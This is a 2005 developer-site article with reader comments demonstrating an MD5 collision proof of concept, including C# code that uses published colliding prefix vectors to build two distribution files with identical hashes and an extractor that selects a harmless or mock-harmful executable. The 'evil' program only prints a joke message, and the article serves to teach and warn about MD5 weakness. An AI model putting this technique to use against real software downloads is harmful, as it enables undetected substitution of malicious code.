Click here to Skip to main content
Email Password   helpLost your password?

Introduction

In my previous article Good Bye MD5, I introduced you to the current findings on cryptology and MD5 collision detection. A debate started, and most of the people think that these findings are not a serious issue.

Microsoft agreed that this is an important issue:

"Microsoft is banning certain cryptographic functions from new computer code, citing increasingly sophisticated attacks that make them less secure, according to a company executive".

"The Redmond, Wash., software company instituted a new policy for all developers that bans functions using the DES, MD4, MD5 and, in some cases, the SHA1 encryption algorithm, which is becoming "creaky at the edges," said Michael Howard, senior security program manager at the company, Howard said". Source: Microsoft Scraps Old Encryption in New Code

We now have some proofs of concept, like a pair of X.509 colliding certificates and a spectacular example of a pair of postscript documents, with the same MD5 hash value, you can read about this in the excellent paper, Attacking Hash Functions by Poisoned Messages "The Story of Alice and her Boss".

How to exploit the collisions

There is a known result about MD5 hash function:

If MD5(x) == MD5(y) then MD5(x+q) == MD5(y+q)

So, if you have a pair of messages, x and y, with the same MD5 value, you can append a payload q, the MD5 value remains the same, the size of q is arbitrary. You need a pair of vectors, x and y to do the exploit. You can try to find a pair for yourself, but we already have a pair of values, given by the Chinese investigators Joux and Wang. A practical use of this pair of vector values is explained in the paper MD5 To Be Considered Harmful Someday, by Dan Kaminsky.

In my blog, I have written about these issues, and now I want to show you how you can make an exploit using these vectors.

Hacking software distribution

The proof of concept to be shown in this article has the following scenario:

This picture shows a scenario, where a pair of binary files with the same MD5 are generated, MD5(good.bin) == MD5(evil.bin):

Attacking the distribution software

First, we will build a generator program, this program takes a pair of executables, the first is a harmless program and the second the evil file, is a harmful program, and generates a pair of binary distribution files (.bin files). These are good.bin distribution file, and an evil.bin distribution file.

The good program

The code of the harmless program is simple:

namespace GoodExe
{
 /// <summary>

 /// A Harmless program

 /// </summary>

 class Class1
 {
  /// <summary>

  /// The main entry point for the application.

  /// </summary>

  [STAThread]
  static void Main(string[] args)
  {
   Console.WriteLine ("this is a good executable");
  }
 }
}

The evil program

This is the code of the evil program, that simulates a harmful behavior:

using System;
using System.Threading;
 
namespace EvilExe
{
  /// <summary>

  /// A harmfull program

  /// </summary>

  class Class1
  {
    /// <summary>

    /// The main entry point for the application.

    /// </summary>

    [STAThread]
    static void Main(string[] args)
    {
      Console.WriteLine ("This is an evil file");
      Console.WriteLine ("Formatting your hard drive...");
      Thread.Sleep(2000);
      Console.WriteLine ("Just joking...");
    }
  }
}

The collision generator

We have a pair of vectors with the same MD5 value:

/// <summary>

/// First prefix vector

/// Taken from stripwire by Dan Kaminsky

/// http://www.doxpara.com/md5_someday.pdf

/// </summary>

static byte[] vec1 = 
{
   0xd1, 0x31, 0xdd, 0x02, 0xc5, 0xe6 
   , 0xee , 0xc4 , 0x69 , 0x3d, 0x9a , 0x06 
   , 0x98 , 0xaf , 0xf9 , 0x5c , 0x2f , 0xca 
   , 0xb5 , /**/0x87 , 0x12 , 0x46 , 0x7e 
   , 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8 
   , 0xfb , 0x7f , 0x89 , 0x55 , 0xad 
   , 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02 
   , 0x83 , 0xe4 , 0x88 , 0x83 , 0x25 
   , 0x71 , 0x41 , 0x5a, 0x08 , 0x51 , 0x25 
   , 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f , 
   0xd9 , 0x1d , 0xbd , 0xf2 , 0x80 , 0x37 
   , 0x3c , 0x5b , 0xd8 , 0x82 , 0x3e 
   , 0x31 , 0x56 , 0x34 , 0x8f , 0x5b , 0xae 
   , 0x6d , 0xac , 0xd4 , 0x36 , 0xc9 
   , 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2 , 0xb4 
   , 0x87 , 0xda , 0x03 , 0xfd , 0x02 
   , 0x39 , 0x63 , 0x06 , 0xd2 , 0x48 , 0xcd 
   , 0xa0 , 0xe9 , 0x9f , 0x33 , 0x42 
   , 0x0f , 0x57 , 0x7e , 0xe8 , 0xce , 0x54 
   , 0xb6 , 0x70 , 0x80 , 0xa8 , 0x0d 
   , 0x1e , 0xc6 , 0x98 , 0x21 , 0xbc , 0xb6 
   , 0xa8 , 0x83 , 0x93 , 0x96 , 0xf9 
   , 0x65 , 0x2b , 0x6f , 0xf7 , 0x2a , 0x70
};
/// <summary>

/// Second prefix vector

/// Taken from stripwire by Dan Kaminsky

/// http://www.doxpara.com/md5_someday.pdf

/// </summary>

static byte[] vec2 = 
{
   0xd1 , 0x31, 0xdd , 0x02 , 0xc5 , 0xe6 
   , 0xee , 0xc4 , 0x69 , 0x3d , 0x9a , 0x06 
   , 0x98 , 0xaf , 0xf9 , 0x5c, 0x2f , 0xca 
   , 0xb5 , /**/0x07 , 0x12 , 0x46 , 0x7e 
   , 0xab , 0x40 , 0x04 , 0x58 , 0x3e , 0xb8 
   , 0xfb , 0x7f , 0x89 , 0x55 , 0xad 
   , 0x34 , 0x06 , 0x09 , 0xf4 , 0xb3 , 0x02 
   , 0x83 , 0xe4 , 0x88 , 0x83 , 0x25 
   ,/**/ 0xf1 , 0x41 , 0x5a , 0x08 , 0x51 , 0x25 
   , 0xe8 , 0xf7 , 0xcd , 0xc9 , 0x9f
   , 0xd9 , 0x1d , 0xbd , /**/0x72 , 0x80 
   , 0x37 , 0x3c , 0x5b, 0xd8 , 0x82 
   , 0x3e , 0x31 , 0x56 , 0x34 , 0x8f , 0x5b 
   , 0xae , 0x6d , 0xac , 0xd4 , 0x36 
   , 0xc9 , 0x19 , 0xc6 , 0xdd , 0x53 , 0xe2 
   , /**/0x34 , 0x87 , 0xda , 0x03 , 0xfd 
   , 0x02 , 0x39 , 0x63 , 0x06 , 0xd2 , 0x48 
   , 0xcd , 0xa0, 0xe9 , 0x9f , 0x33 
   , 0x42 , 0x0f , 0x57 , 0x7e , 0xe8 , 0xce 
   , 0x54 , 0xb6 , 0x70 , 0x80 , /**/ 0x28 
   , 0x0d , 0x1e, 0xc6 , 0x98 , 0x21 , 0xbc 
   , 0xb6 , 0xa8 , 0x83 , 0x93 , 0x96 
   , 0xf9 , 0x65 , /* flag byte*/0xab 
   , 0x6f , 0xf7 , 0x2a , 0x70
};

Remember that given this pair of vectors, if we have a payload of any size, then MD5(vec1+payload) == MD5(vec2+payload). The payload is built in this way, the length of good file, the length of evil file, the content of the good file, and the content of the evil file.

The core of the generation program is shown below:

[STAThread]
static void Main(string[] args)
{
   if (args.Length != 2)
    Usage();

 
   byte[] goodFile = ReadBinaryFile(args[0]);
   byte[] evilFile = ReadBinaryFile(args[1]);
   
   WriteBinary("good.bin", vec1, goodFile, evilFile);
   WriteBinary("evil.bin", vec2, goodFile, evilFile);
   
   ShowMD5("good.bin");
   ShowMD5("evil.bin");
}
   
private static void Usage ()
{
   Console.WriteLine("Usage: md5gen good_file evil_file");
   Environment.Exit (-1);
}

 
private static void WriteBinary (string sOutFileName, 
          byte[] prefix, byte[] goodFile, byte[] evilFile)
{
   using (FileStream fs = File.OpenWrite (sOutFileName))
   {
      using (BinaryWriter writer = new BinaryWriter(fs))
      {
         writer.Write(prefix);
         writer.Write ( goodFile.Length );
         writer.Write ( evilFile.Length );
         fs.Write (goodFile, 0, goodFile.Length);
         fs.Write (evilFile, 0, evilFile.Length);
         fs.Close ();
      }
   }
}

If we apply the generator program to the pair of programs, we generate a pair of files, good.bin and evil.bin in the following way:

C:\TEMP>md5clone goodexe.exe evilexe.exe
MD5 Hash for good.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7
MD5 Hash for evil.bin is 1D8EE13FBA00DD022F002AAD0E3EF9C7

Now, we can publish good.bin in the Internet for people to download it, and later, we can replace it with evil.bin. Now, the users will get infected, without noticing and convinced that there is no tampering, because the MD5 signature is the same for both files, in others words we have MD5(good.bin) == MD5(evil.bin).

The extractor program

Now, suppose we have changed the extractor program, with our own version. Our extractor receives the .bin distribution file, and extracts the good or evil program based on the prefix vector at the beginning of the .bin file. We use the byte at position 123 to detect the vector that is used for the prefix.

The code of the extractor is very simple:

  [STAThread]
  static void Main(string[] args)
  {
    if (args.Length == 0)
     Usage();
    ExtractFile(args[0], args[1]);
  }

 
  private static void ExtractFile (string sfilename, 
                                      string soutputfile)
  {
    using (BinaryReader reader = 
            new BinaryReader(File.OpenRead (sfilename)))
    {
      byte[] vec = reader.ReadBytes (128);
      int goodSize = reader.ReadInt32 ();
      int evilSize  = reader.ReadInt32 ();
      /// open evil file

      if (vec[123] == 0xab)
      {
        reader.ReadBytes (goodSize);
        byte[] evil = reader.ReadBytes (evilSize);
        using (BinaryWriter writer = 
              new BinaryWriter(File.OpenWrite (soutputfile)))
        {
           writer.Write (evil);
           writer.Close (); 
        }
      }
      else
      {
        byte[] good = reader.ReadBytes (goodSize);
        using (BinaryWriter writer = 
            new BinaryWriter(File.OpenWrite (soutputfile)))
        {
           writer.Write (good);
           writer.Close ();
        }
      }
      Console.WriteLine ("File written on {0}", 
                                       soutputfile);
    }
  }

 
  private static void Usage ()
  {
     Console.WriteLine(
        "Usage: md5extract file.bin output_file.exe");
     Environment.Exit (-1);
  }

Suppose, you receive the good.bin file, then you apply the extractor on good.bin and the good.exe file is extracted. But if you receive the evil.bin file, then the extractor will extract the evil.exe, i.e. the harmful executable. Remember that MD5(evil.bin) == MD5(good.bin).

Conclusion

Recently, the world of cryptographic hash functions was on crisis. A lot of researchers announced "attacks" to find collisions for common hash functions such as MD5 and SHA-1. "For cryptographers, these results are exciting - but many so-called "practitioners" turned them down as practically irrelevant".

I hope, this proof of concept will convince you that there is a serious issue with MD5.

"There have already been a few exploits of the collision-finding attacks against MD5: Kaminski [Ka] and Mikle [Mi] presented different executables with the same MD5 hash. One of Kaminski's executables was quite harmless, the other one very harmful. Mikle's executables were self-extracting archives, extracting different stuffs. Lenstra, Wang and de Weger [LWdW,LdW] constructed colliding X.509 certificates".

This article shows how a failure on the software distribution chain, allows exploiting the current findings on cryptology about the MD5 hash function.

History

You must Sign In to use this message board.
 
 
Per page   
 FirstPrevNext
GeneralCertificate collision
MilanTomic78
0:49 14 Oct '05  
Can your code/example/article be used to create two certificates with the same MD5 signatures? Where can I find such info?
GeneralRe: Certificate collision
ediazc
4:27 14 Oct '05  
The same principles of the sample were used to build two certificates.
Check this links:
http://cryptography.hyperlink.cz/MD5_collisions.html[^]

http://cryptography.hyperlink.cz/MD5_collisions.html[^]

Cool

Eduardo Diaz

site | english blog | spanish blog
GeneralCaesar and Alice was better
Anonymous
15:32 23 Sep '05  
This is interesting but semantically identical to the original Caesar and Alice example. I do agree with some of the sentiments made by others that it doesn't offer a lot because it is so contrived. Having a custom extractor that is part of the evil mechanism is not as elegant as using inherent postscript functions.

I'm sure with some thought that smart hackers will find more 'natural' / socially acceptable ways of using these MD5 collisions to deliver evil payloads.
GeneralRe: Caesar and Alice was better
ediazc
6:24 24 Sep '05  
Sure, the Caesar an Alice example is more elegant. Sadly, it doesn't work with Adobe.
The _extractor_ and the _prostcript interpreter_ are, as you say, semantically identical.
The fact is that I want tu divulgate this issues to a broader community of developers to be aware of this problems.

Thanks for your comments.
Smile

Eduardo Diaz

site | english blog | spanish blog
GeneralSecurity is a process
ediazc
8:44 23 Sep '05  
Many of the comments received are nice.
However some of them don't get the point of the article.
The sample is adhoc, and simulate a part of a software distribution process.
The fact that MD5(x) == MD5(y) => MD5(x+q) == MD5(y+q) is the real problem.

In fact this exploit can be seen this way:

MD5(x+ccode+trusted_file) == MD5(y+ccode+trusted_file+evil_file)

then, if you have an interpreter that ignores the prefixes x, and y, an you are able to put your conditional code (ccode) then you don't need the extractor.

You can't trust on MD5 hashes, because the previous property.

Eduardo Diaz

site | english blog | spanish blog
Generalthis is stupid
ahurwitz
6:21 23 Sep '05  
if the good program includes the evil program (and vice versa), then you are really not demonstrating anything interesting here. this is a waste of time. i can't believe this crap got on slashdot.


GeneralRe: this is stupid
Vanco
7:20 23 Sep '05  
Well, somebody *is* stupid, definitely.
Did you read the introduction, at least?
Oh, ok, here it is: the point is that you can have two different programs with the same MD5 checksum. That enables malicious people to send you some program with, for example, some backdoor built in (so they can enter your system at will), all the while you happily check the MD5 checksum and think that everything is nice and clean.

Refrain from derogatory comments, they make *you* look stupid. Even if something, in your opinion, seems wrong, state it clearly.
Oh, you are such a waste of time Sleepy .

-- modified at 12:21 Friday 23rd September, 2005
GeneralRe: this is stupid
ahurwitz
8:32 23 Sep '05  
if you can include "evil" code inside of "good" code, then technically the "good" code is not good and there is no point in having a second "evil" program because you've already delivered the evil code in the first program. what is outlined here does not actually enable anyone to deliver evil code to anyone else. the delivery of bad code is already done when the user decides to download the first, "good" version.


GeneralRe: this is stupid
Anonymous
10:08 23 Sep '05  
what the article is saying, is that you can distribute a "good" file with a specific MD5 sum, then later on, change the "good" file with some other file that is "bad" and since this new "bad" file has the same MD5 sum of the old "good" file, noone would be able to tell that the file is different.
GeneralRe: this is stupid
ahurwitz
8:34 23 Sep '05  
and i apologize if i offended the author with my comments.
GeneralRe: this is stupid
Anonymous
9:01 23 Sep '05  
You really didn't understand what you read. No comments.
GeneralRe: this is stupid
xacatecas
23:05 23 Sep '05  
Actually I agree with him. This doesn't prove a thing other than what long known - there has to be collisions. And this can be proven with the pigeon hole principle - you cannot shove more pigeons into a set of pigeon holes than there are pigeon holes. In other words (for MD5) if you have 2 ^ 128 + 1 files then you _must_ have a collision.

Note that (in this example) the md5extractor is part of the "evil" system. _it_ makes the selection between which of the two files are going to be placed back. In short, this attack does not allow me to replace good code for evil code. Not yet anyway. Take for example the way in which Gentoo Linux distributes packages (I'd attack the rsync mechanism in that particular case if I was evil). It stores and MD5 hash of the _good_ code. Now if I want to replace the code with something evil then I don't have code on the "clean" system to begin with - all I've got to work with is replacing the source archive, and the MD5s need to match. I've got no starting matching data and I must generate a _valid_ .tar.gz archive. Suddenly the problem becomes a lot harder again.

Give respect and credit where it is due, to Joux and Xang for actually finding two vectors that produce the same MD5.

I'll be impressed when someone shows me a way to take any arbitrary file and add a small amount of data to that file to get to a particular MD5 (and in the case of .tar.gz still extract without any warnings). Not when someone already has an evil bootstrap on the system under attack. To get md5extractor onto the system (or replace emerge with the evil bootstrap) the system needs to be broken already - what is the point of this attack then?
GeneralRe: this is stupid
evildictaitor
8:38 7 Sep '06  
Wow. You have utterly misunderstood what this article is about. While is it obvious that MD5 has collissions (as do all hash-forming functions, but definition), the exploit is that if MD5(x) == MD5(y) then MD5(x+p) == MD5(y+p) where p is arbitrary.

Say someone hacked microsoft.com and overwrote the installation for the dotNET framework or microsoft vista beta 2 for instance and used this method to insert an arbitrary program (which is our selected p) into the executable and noone and microsoft would be any-the-wiser because the MD5 checksum would be the same.

Coincidentally the same is also true for MD4, but not SHA1, or SHA256.
GeneralRe: this is stupid
anonymous
23:06 23 Sep '05  
Actually I agree with him. This doesn't prove a thing other than what long known - there has to be collisions. And this can be proven with the pigeon hole principle - you cannot shove more pigeons into a set of pigeon holes than there are pigeon holes. In other words (for MD5) if you have 2 ^ 128 + 1 files then you _must_ have a collision.

Note that (in this example) the md5extractor is part of the "evil" system. _it_ makes the selection between which of the two files are going to be placed back. In short, this attack does not allow me to replace good code for evil code. Not yet anyway. Take for example the way in which Gentoo Linux distributes packages (I'd attack the rsync mechanism in that particular case if I was evil). It stores and MD5 hash of the _good_ code. Now if I want to replace the code with something evil then I don't have code on the "clean" system to begin with - all I've got to work with is replacing the source archive, and the MD5s need to match. I've got no starting matching data and I must generate a _valid_ .tar.gz archive. Suddenly the problem becomes a lot harder again.

Give respect and credit where it is due, to Joux and Xang for actually finding two vectors that produce the same MD5.

I'll be impressed when someone shows me a way to take any arbitrary file and add a small amount of data to that file to get to a particular MD5 (and in the case of .tar.gz still extract without any warnings). Not when someone already has an evil bootstrap on the system under attack. To get md5extractor onto the system (or replace emerge with the evil bootstrap) the system needs to be broken already - what is the point of this attack then?
GeneralRe: this is stupid
Anonymous
10:10 23 Sep '05  
You apparently don't get it. The whole point is that, after submitting the good code (with the bad code appended to it, although inert), a malicious programmer could then replace the file with one that has the bad code active, and the good code inert, and the MD5 checksum would be the same.
GeneralRe: this is stupid
orlyfu
13:05 7 Nov '05  
No dude, this is too much for you to comprehend so quit arguing senselessly!

xacatecas hit the nail on the head. What Kaminsky and this nut who wrote this C# 'simulation' did is nothing more than a magic trick. Re-read what 'xacatecas' posted above, I'll refrain from reiterating.

Before replying to a post with arrogance, try comprehending the orignal goddamn research.

-x
GeneralRe: this is stupid
evildictaitor
8:33 7 Sep '06  
Just ignore him. Anyone that reads slashdot is an idiot by definition.
GeneralRe: this is stupid
Daniel Bolaños
9:33 23 Mar '07  
QFT.

Slashdot is controlled by a few people, which are totally biased and deliver the same type of news everyday. I stopped reading a while ago cause its quality became terrible.
GeneralWhat would be *really* useful ...
CDGuru
6:06 23 Sep '05  
would be a tool which creates all of the possible "candidate" files from an MD5 value. So, let's say you had the MD5 value of an executable. With this tool you could produce all of the possible original files which result in this MD5 hash value. Most of them will not be well-formed executables, so they could be quickly filtered out.

The remaining files could be further filtered if you had some idea of the size of the original file. Other filtering techniques could be applied to still further reduce the number of possible files.

The end result - possibly after considerable computation time - would be a few files and one of them would be the original executable. Right?

Do not be misled into thinking that this would be some magic that produces the one true file. There would be a significant number of candidates dispite whatever filtering was applied. MD5 is a hash function where multiple sources resolve to the same hash value.

Obviously, there is a brute-force way of doing this, but that would be a rather crude approach. It would seem there would be a mathematical approach that would be significantly better than brute force.

Now that would be really useful.
GeneralSlashdotted
Judah Himango
5:18 23 Sep '05  
Your article has been posted on Slashdot. Check out the story here[^].

Tech, life, family, faith: Give me a visit.
I'm currently blogging about: Cops & Robbers Judah Himango


GeneralRe: Slashdotted
ediazc
8:33 23 Sep '05  
In fact, yesterday the article has < 4.000 views, today it has 17.000+.
Smile

Eduardo Diaz

site | english blog | spanish blog
Generalextractor
Fred Spiessens
4:01 23 Sep '05  
Nice example and it's good to know that MD5 collisions can be that easily extended, which is indeed very dangerous. Because the example needs an additional attack on the extractor software, it can trick us into underestimating the problem. There is no need for an extra attack on trusted software that uses the colliding files, if that trusted software is itself not sensitive for the first part of the files.

Consider for example an interpreter that by construction skips a fixed number of bytes at the beginning of the source code files when starting the interpretation, e.g. because the interpreter expects only initialization data at that place. The initialization data will be made available for use and interpretation by the program itself, which starts after the fixed initial space. Now suppose we can fit the colliding payloads of the good an bad source files into that initial space. Our good and bad programs are the same, but what they actually do depends completely on that initial data. In that case, a code analysis of the "good" source code could generate well founded trust about the good program, based on its harmless initialization data. This trust would then extend to the bad program because both the good and the bad source code files have the same hash.

Fred.
GeneralDoes this example demonstrate anything?
anonymous
3:58 23 Sep '05  
I haven't downloaded, but based on the cmd window screenshot, you nede to clearly show that the MD5 of good.exe and bad.exe match - not goodexe.exe & badexe.exe for which we can't associate similar or different code.

So here my question relating to demonstation of a compromise:

MD5(x) == MD5(y) then MD5(x+q) == MD5(y+q)

is understood.

So we start out w/ two byte blocks which are known to result in the same hash: x & y
Then we embed these in an exe - one exe that does something good and one that does something bad.
qx != qy
so MD5(x+qx) != MD5(y+qy). Check the md5 sums of good.exe and bad.exe.

Ok. So this is obvious, I must have missed your point. It would be very interesting to show software or a general algorithm which demonstrates the compromise of MD5 in finding x and y such that MD5(x) == MD5(y) other than using brute force. I'm not clear on the application of what is shown here.


GeneralRe: Does this example demonstrate anything?
moobobcat
23:50 9 Oct '05  
he is actually doing the following:

MD5(good + bad + vector1) == MD5(good + bad + vector2), where MD5(vector1) == MD5(vector2).
The extractor program then checks if vector1 or vector2 was used to create the binary package, and extracts the good or bad exe depending on that condition.
Generalfile size
eean
1:47 23 Sep '05  
I'm confused, are these two files with the same md5sum's the same file size? MD5 sums are meant to be compared againist files of the same file size after all.


Last Updated 20 Sep 2005 | Advertise | Privacy | Terms of Use | Copyright © CodeProject, 1999-2010